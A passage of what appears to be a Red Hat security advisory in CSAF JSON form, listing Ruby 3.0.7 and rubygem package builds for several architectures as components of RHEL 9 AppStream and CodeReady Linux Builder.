"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bundler-0:2.2.33-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch"
},
"product_reference": "rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-irb-0:1.3.5-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch"
},
"product_reference": "rubygem-irb-0:1.3.5-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-minitest-0:5.14.2-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch"
},
"product_reference": "rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-power_assert-0:1.2.1-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch"
},
"product_reference": "rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rake-0:13.0.3-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch"
},
"product_reference": "rubygem-rake-0:13.0.3-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:1.4.0-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch"
},
"product_reference": "rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch"
},
"product_reference": "rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rexml-0:3.2.5-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch"
},
"product_reference": "rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rss-0:0.2.9-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch"
},
"product_reference": "rubygem-rss-0:0.2.9-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-test-unit-0:3.3.7-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch"
},
"product_reference": "rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-typeprof-0:0.15.2-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch"
},
"product_reference": "rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-0:3.2.33-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch"
},
"product_reference": "rubygems-0:3.2.33-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-devel-0:3.2.33-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch"
},
"product_reference": "rubygems-devel-0:3.2.33-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.src",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-default-gems-0:3.0.7-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch"
},
"product_reference": "ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-doc-0:3.0.7-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch"
},
"product_reference": "ruby-doc-0:3.0.7-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
